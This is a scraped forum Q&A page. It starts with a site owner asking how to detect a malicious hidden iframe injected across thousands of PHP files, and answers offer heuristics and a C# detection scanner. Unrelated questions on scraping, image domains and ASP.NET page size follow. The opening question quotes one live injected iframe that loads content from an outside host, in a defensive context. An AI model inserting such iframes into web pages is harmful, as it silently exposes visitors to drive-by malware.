Is there any legitimate use for a hidden iframe? I've got a virus infection (see Can a file be read and written right back with small changes without knowing its encoding in C#?) that is spread all over my PHP files; it looks like one injected entry per file, but I can't be sure with 5,000 files.
The ones I found look like the snippet below, but I can't be sure there aren't others with something slightly different inside. Could I assume that every iframe whose visibility is hidden is malicious?
<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>
Or is there some other rule I could have my C# code check for? I don't want to break the files or the websites, but I can't just search for the exact value, since I might miss something.
A hidden IFRAME can certainly be useful for malicious purposes, but it can be used legitimately. For example, you could use a hidden IFRAME to emulate asynchronous calls to the server (ASP.Net did this at one point, if I recall).
I have also used IFRAMEs to get around file upload control limitations (both hidden and visible IFRAMEs can be useful for this).
Suspicious, but not malicious by default.
Some old traffic counters I've seen use hidden iFrames to count traffic, but that's about the only legitimate usage of a hidden iFrame; I certainly don't like it and if it were me, I would remove those as well.
Another thing you could check for is whether the iframe is hidden and its source is not from your domain.
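For the asker's C#-scan idea, here is a rough sketch of that heuristic (a hidden iframe whose src does not point at your own domain). It only catches the inline visibility:hidden variant shown above; the folder path and the "example.com" domain are placeholders you would replace.

using System;
using System.IO;
using System.Text.RegularExpressions;

class HiddenIframeScanner
{
    // Matches iframes with an inline style containing visibility: hidden.
    static readonly Regex HiddenIframe = new Regex(
        @"<iframe\b[^>]*style\s*=\s*[""'][^""']*visibility\s*:\s*hidden[^""']*[""'][^>]*>",
        RegexOptions.IgnoreCase);

    static void Main()
    {
        foreach (string file in Directory.GetFiles(@"C:\site", "*.php", SearchOption.AllDirectories))
        {
            // Read-only scan, so the encoding question from the linked post doesn't matter here.
            string text = File.ReadAllText(file);

            foreach (Match m in HiddenIframe.Matches(text))
            {
                // Only flag iframes that point away from your own domain.
                Match src = Regex.Match(m.Value, @"src\s*=\s*[""']?([^""'\s>]+)", RegexOptions.IgnoreCase);
                if (src.Success && !src.Groups[1].Value.Contains("example.com"))
                    Console.WriteLine("{0}: {1}", file, m.Value);
            }
        }
    }
}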
Related
There are several websites that use AJAX to update their contents periodically, and I would like to monitor them. That's why I need to keep multiple browser windows open at all times and grab their page sources periodically.
I am looking for an approach to get the HTML source from these webpages. Could you recommend something? I need it for statistical analysis.
Here are my thoughts so far:
Approach 1: open separate Chrome windows manually and use window handles to find them. The problem is that it is nearly impossible to grab the HTML of the page this way (only the rendered rich text).
Approach 2: write an extension for Chrome/Firefox plus a C# program. The program would send requests to the extension and the extension would return the HTML contents of the page. That's the theory; my searches didn't raise my hopes much, so I am not sure it's possible.
Approach 3 (the most realistic one): use an embedded browser such as CefSharp, Awesomium, etc. But as I mentioned, it has to support multiple open windows. Any problems here?
So, these are my thoughts after hours of study.
Personally I would love to implement approach 2, since it is the most appealing, but the others would do too. Which would be the easiest and most bulletproof?
Additionally, I would love to be able to perform some input operations in these windows, e.g. log in and navigate.
If the IE browser is an option, look at implementing a managed add-on that will let you hook into notifications when the document is loaded, get access to the live DOM of the document, possibly get notifications when the DOM changes, and so on. The same can be done in FF/Chrome. With IE, look into the IObjectWithSite COM interface. This article seems to be a decent tutorial, though I'm not vouching for its accuracy.
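If a full IE add-on is more than you need, the same basic idea (wait for the document-loaded notification, then read the live DOM) can be sketched with the WinForms WebBrowser control. This is only an in-process simplification of what the answer describes, not the add-on itself, and the URL is a placeholder.

using System;
using System.Windows.Forms;

class PageGrabber
{
    [STAThread]
    static void Main()
    {
        // One WebBrowser per page you want to keep open; the control needs an
        // STA thread with a message pump, hence the DoEvents loop below.
        var browser = new WebBrowser { ScriptErrorsSuppressed = true };
        browser.Navigate("http://example.com");   // placeholder URL

        while (browser.ReadyState != WebBrowserReadyState.Complete)
            Application.DoEvents();

        // Live DOM access: DocumentText is the HTML as originally received,
        // while Document.Body below reflects later changes made by AJAX calls.
        Console.WriteLine(browser.DocumentTitle);
        Console.WriteLine(browser.Document.Body.InnerHtml.Length);
    }
}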
I have a webpage which has an iframe, a textbox and a button, but nothing else. The user types a URL into the textbox and then clicks the button; after that, the URL is assigned as the source of the iframe.
What happens afterwards is that a Java applet takes a screenshot of the webpage, etc.
What I discovered today is that in Google Chrome there is an option in the right-click menu named "Inspect element". With this feature, users can change what's inside the iframe and manipulate the original data. Does anyone know how I can encrypt the source of the iframe?
P.S. The source of the iframe is authenticated data.
(Screenshots showed the iframe contents before and after manipulation.)
The short answer to your question is "no". HTML is a client-side markup language; while you may find ways to make things increasingly difficult to "manipulate", you ultimately have no ability to entirely prevent a user from seeing every single detail of what you are trying to do, with one significant exception: the use of an applet or plugin (i.e. Flash, Java, ActiveX).
To help with your problem, if you are already using an applet, why not leverage that over using an iframe? You could also consider using the applet to generate a jpeg for delivery rather than HTML.
I am developing a web application in C#/.NET. For images on my site I am using relative paths. However, to improve the performance of my site, I am looking to introduce a cookieless domain for images.
In most situations I can just add the domain to the images.
But in certain scenarios I can't, and need to do it at run time. So I am looking at introducing some code to resolve the URLs. I have a couple of options for doing this:
A method in a base page that loops through all the controls and appends the domain to every control that inherits from System.Web.UI.WebControls.Image, if the domain is not already present (sketched below).
Or do something similar in an HTTP module. (Is this possible?)
Will doing the above slow down my site's rendering? I don't want this to be counterproductive!
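For reference, a minimal sketch of the first option (a base page that walks the control tree); the class name and the http://static.example.com host are placeholders.

using System;
using System.Web.UI;
using System.Web.UI.WebControls;

public class CdnBasePage : Page
{
    private const string ImageHost = "http://static.example.com";  // placeholder cookieless host

    protected override void OnPreRender(EventArgs e)
    {
        base.OnPreRender(e);
        PrefixImageUrls(this);
    }

    private static void PrefixImageUrls(Control parent)
    {
        foreach (Control child in parent.Controls)
        {
            // Only touch Image controls with site-relative URLs.
            var img = child as Image;
            if (img != null && img.ImageUrl.StartsWith("/"))
                img.ImageUrl = ImageHost + img.ImageUrl;

            if (child.HasControls())
                PrefixImageUrls(child);
        }
    }
}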
Either of the above approaches should work ok for .net controls.
But any ideas how I might append the domain to plain HTML img tags and/or any images referenced within my stylesheets? I can probably just set the domain on the img tags in code, but I'm not sure about the stylesheets.
You can consider using Response.Filter too.
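A rough sketch of the Response.Filter idea, which also covers plain img tags in the markup. The class names, the /images/ path convention and the static.example.com host are all placeholders, the module still needs to be registered in web.config, and a production filter would also have to handle intermediate flushes and the response's actual encoding.

using System;
using System.IO;
using System.Text;
using System.Web;

public class CdnImageFilter : Stream
{
    private readonly Stream _inner;
    private readonly MemoryStream _buffer = new MemoryStream();

    public CdnImageFilter(Stream inner) { _inner = inner; }

    public override void Write(byte[] buffer, int offset, int count)
    {
        // Buffer everything so a tag is never split across two chunks.
        _buffer.Write(buffer, offset, count);
    }

    public override void Flush()
    {
        // Assumes UTF-8 output.
        string html = Encoding.UTF8.GetString(_buffer.ToArray());

        // Naive rewrite: prefix site-relative image paths with the cookieless host.
        html = html.Replace("src=\"/images/", "src=\"http://static.example.com/images/");

        byte[] bytes = Encoding.UTF8.GetBytes(html);
        _inner.Write(bytes, 0, bytes.Length);
        _inner.Flush();
        _buffer.SetLength(0);
    }

    // Minimal Stream plumbing.
    public override bool CanRead { get { return false; } }
    public override bool CanSeek { get { return false; } }
    public override bool CanWrite { get { return true; } }
    public override long Length { get { return 0; } }
    public override long Position { get; set; }
    public override int Read(byte[] buffer, int offset, int count) { throw new NotSupportedException(); }
    public override long Seek(long offset, SeekOrigin origin) { throw new NotSupportedException(); }
    public override void SetLength(long value) { throw new NotSupportedException(); }
}

public class CdnFilterModule : IHttpModule
{
    public void Init(HttpApplication app)
    {
        app.PostRequestHandlerExecute += (s, e) =>
        {
            // Only rewrite HTML responses.
            if (app.Response.ContentType == "text/html")
                app.Response.Filter = new CdnImageFilter(app.Response.Filter);
        };
    }

    public void Dispose() { }
}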
I have been given the task of crawling/parsing and indexing the available books on many library web pages. I usually use HTML Agility Pack and C# to parse website content. One of the pages is the following:
http://bibliotek.kristianstad.se/pls/bookit/pkg_www_misc.print_index?in_language_id=en_GB
If you search for a * (all books) it will return many lists of books, paginated by 10 books per page.
Typical web crawlers that I have found fail on this website. I have also tried to write my own crawler, which would go through all the links on the page and generate the POST/GET variables needed to dynamically produce results. I haven't been able to get this to work either, mostly because of 404 errors (although I am certain that the links I generate are correct).
The site relies on javascript to generate content, and uses a mixed mode of GET and POST variable submission.
I'm going out on a limb, but try observing the JavaScript GETs and POSTs with Fiddler and then you can base your crawling off of those requests. Fiddler has FiddlerCore, which you can put in your own C# project. Using this, you could monitor requests made in the WebBrowser control and then save them for crawling or whatever, later.
Going down the C# JavaScript interpreter route sounds like the 'more correct' way of doing this, but I wager it will be much harder and fraught with errors and bugs unless you have the simplest of cases.
Good luck.
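To illustrate the replay idea: once Fiddler shows you the exact request the page's JavaScript sends, you can reproduce it with HttpWebRequest and hand the returned HTML to HTML Agility Pack. The form fields below are invented placeholders; copy the real ones from the captured request.

using System;
using System.IO;
using System.Net;
using System.Text;

class ReplayCrawler
{
    static void Main()
    {
        // Placeholder request data -- take the real URL and body from Fiddler.
        string url = "http://bibliotek.kristianstad.se/pls/bookit/pkg_www_misc.print_index";
        string postData = "in_language_id=en_GB&searchterm=*&page=2";

        var request = (HttpWebRequest)WebRequest.Create(url);
        request.Method = "POST";
        request.ContentType = "application/x-www-form-urlencoded";
        // Sites like this often care about these headers; mirror what Fiddler shows.
        request.Referer = url;
        request.UserAgent = "Mozilla/5.0";
        request.CookieContainer = new CookieContainer();  // keep the session alive across requests

        byte[] body = Encoding.UTF8.GetBytes(postData);
        using (Stream s = request.GetRequestStream())
            s.Write(body, 0, body.Length);

        using (var response = (HttpWebResponse)request.GetResponse())
        using (var reader = new StreamReader(response.GetResponseStream()))
        {
            string html = reader.ReadToEnd();
            Console.WriteLine(html.Length);  // hand this off to HTML Agility Pack
        }
    }
}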
FWIW, the C# WebBrowser control is very, very slow. It also doesn't support more than two simultaneous requests.
Using SHDocVw is faster, but is also semaphore limited.
Faster still is using MSHTML. Working code here: https://svn.arachnode.net/svn/arachnodenet/trunk/Renderer/HtmlRenderer.cs Username/Password: Public (doesn't have the request/rendering limitations that the other two have when run out of process...)
This is headless, so none of the controls are rendered. (Faster).
Thanks,
Mike
If you use the WebBrowser control in a Windows Forms application to open the page then you should be able to access the DOM through the HtmlDocument. That would work for the HTML links.
As for the links that are generated through JavaScript, you might look at the ObjectForScripting property, which should allow you to interface with the HTML page through JavaScript. The rest then becomes a JavaScript problem, but it should (in theory) be solvable. I haven't tried this so I can't say.
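A sketch of what that might look like: the WebBrowser's HtmlDocument gives you the plain HTML links, and ObjectForScripting lets script running inside the page call back into C#. The ScriptBridge class and the injected snippet are illustrative only.

using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;

[ComVisible(true)]  // required so the page's script can see this object via window.external
public class ScriptBridge
{
    public void ReportLink(string href)
    {
        Console.WriteLine("script reported: " + href);
    }
}

public class CrawlerForm : Form
{
    private readonly WebBrowser _browser = new WebBrowser();

    public CrawlerForm()
    {
        Controls.Add(_browser);
        _browser.ObjectForScripting = new ScriptBridge();
        _browser.DocumentCompleted += OnLoaded;
        _browser.Navigate("http://bibliotek.kristianstad.se/pls/bookit/pkg_www_misc.print_index?in_language_id=en_GB");
    }

    private void OnLoaded(object sender, WebBrowserDocumentCompletedEventArgs e)
    {
        // Plain HTML links are directly available from the DOM.
        foreach (HtmlElement a in _browser.Document.Links)
            Console.WriteLine(a.GetAttribute("href"));

        // Demonstrates the callback path: run JavaScript in the page and have it
        // report back through window.external into ScriptBridge above.
        _browser.Document.InvokeScript("eval", new object[]
        {
            "for (var i = 0; i < document.links.length; i++)" +
            "  window.external.ReportLink(document.links[i].href);"
        });
    }

    [STAThread]
    static void Main()
    {
        Application.Run(new CrawlerForm());
    }
}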
If the site generates content with JavaScript, then you are out of luck. You need a full JavaScript engine usable in C# so that you can actually execute the scripts and capture the output they generate.
Take a look at this question: Embedding JavaScript engine into .NET -- but know that it will take "serious" effort to do what you need.
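As a taste of what embedding an engine looks like, here is a minimal sketch using the Jint library (Jint is not mentioned in that question; it is just one embeddable .NET JavaScript engine). Note there is no DOM here, which is exactly where the "serious" effort comes in: this only gets you as far as the page's scripts don't depend on document or window.

using System;
using Jint;  // NuGet package "Jint"; named here as one example engine, not something from the thread

class ScriptProbe
{
    static void Main()
    {
        var engine = new Engine();

        // Expose a .NET callback, then run a made-up snippet of the kind you
        // might lift from the page, to see what URL its script would build.
        engine.SetValue("capture", new Action<string>(url => Console.WriteLine("would request: " + url)));

        engine.Execute(
            "function buildUrl(page) { return '/pls/bookit/pkg_www_misc.print_index?page=' + page; } " +
            "capture(buildUrl(2));");
    }
}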
AbotX does JavaScript rendering for you. It's not free though.
I'm developing a newsletter in ASP.NET that will be sent to a large number of users, so every kilobyte I can shave off will help a lot with bandwidth consumption. What I have done so far is write the aspx without some of the spaces between tags and, before rendering, rename some control IDs to "-" to save more space.
Right now the file is 50 KB; I need it to be around 25 KB.
Can anyone suggest any other way to save more space?
P.S. I use 3 divs with some data, and 2 repeaters, one inside the other, to generate a table of data.
EDIT: I've disabled ViewState and removed unnecessary divs. I'll check whether gzip is enabled in IIS.
thanks in advance
Make sure HTTP compression is enabled. Trimming the HTML itself will help, but enabling HTTP compression will give you far more than the marginal improvements you're likely to see from hand-optimizing the markup.
There are different ways to enable compression, depending on your version of IIS. For instance, in IIS 6.0, you can manually edit metabase.xml or run:
cscript adsutil.vbs set w3svc/filters/compression/parameters/HcDoDynamicCompression true
You can check the HTTP headers to verify that compression is enabled using something like Live HTTP Headers for Firefox (https://addons.mozilla.org/en-US/firefox/addon/3829/). Look for "Content-Encoding: gzip" in the response headers.
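If you'd rather check from code than install a Firefox add-on, a small C# request can show the same header; the URL is a placeholder for a page on your own site.

using System;
using System.Net;

class CompressionCheck
{
    static void Main()
    {
        // Replace with a page on your own site.
        var request = (HttpWebRequest)WebRequest.Create("http://www.example.com/newsletter.aspx");
        request.Headers[HttpRequestHeader.AcceptEncoding] = "gzip, deflate";

        using (var response = (HttpWebResponse)request.GetResponse())
        {
            // "gzip" (or "deflate") here means compression is actually being applied.
            Console.WriteLine("Content-Encoding: " + response.Headers["Content-Encoding"]);
            Console.WriteLine("Content-Length:   " + response.ContentLength);
        }
    }
}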
Don't use an aspx page if you want full control. Make a Generic Handler, and then you can have full control over every byte generated.
Instead of using Repeaters, just loop through a dataset and output tables or spans or something. Although, I have to say, repeaters are very easy to control the exact output of, too.
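A rough sketch of that handler approach (an .ashx); the NewsletterHandler name, the Title column and the GetNewsletterRows helper are made up for the example.

using System.Data;
using System.Web;

public class NewsletterHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/html";
        var w = context.Response.Output;

        w.Write("<html><body><table>");
        foreach (DataRow row in GetNewsletterRows().Rows)
        {
            // Emit exactly the markup you want, nothing more.
            w.Write("<tr><td>");
            w.Write(context.Server.HtmlEncode(row["Title"].ToString()));
            w.Write("</td></tr>");
        }
        w.Write("</table></body></html>");
    }

    public bool IsReusable { get { return true; } }

    private DataTable GetNewsletterRows()
    {
        // Placeholder: load the newsletter data however the site already does.
        return new DataTable();
    }
}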
Look at your generated html and see if you can identify any obvious culprits.
You can disable the viewstate and optimize image files if you are using any.
I recommend going over this article if you're using ASP.NET Web Forms; it explains how to correctly use ViewState:
http://weblogs.asp.net/infinitiesloop/archive/2006/08/03/Truly-Understanding-Viewstate.aspx
You might want to look into IIS compression (it uses gzip, IIRC). That should knock the file size down.
Also minify the JavaScript/CSS (I've done that and seen up to a 40% reduction in JS/CSS file sizes). Here's a link to a book/website that covers other things you can do: http://developer.yahoo.com/performance/rules.html. The book's title is "High Performance Web Sites", ISBN 978-0-596-52930-7.
It may not work out to much savings, but you can also reduce markup by seriously considering whether to use DIVs for styling purposes when styling the contents directly would achieve the same result.
For instance,
<div class="sidebar">
<ul>
<li>Lorem</li>
</ul>
</div>
In most cases you can get the same result from styling the UL directly:
<ul class="sidebar">
<li>Lorem</li>
</ul>
But in your case, the repeaters are probably the main source of the bloat. Make sure you're using a custom template for them with clean HTML, and not relying on the out of the box rendering, which can be quite messy.
Like someone else posted, turn off viewstate for any controls you don't need it on - that's a TON of junk alone.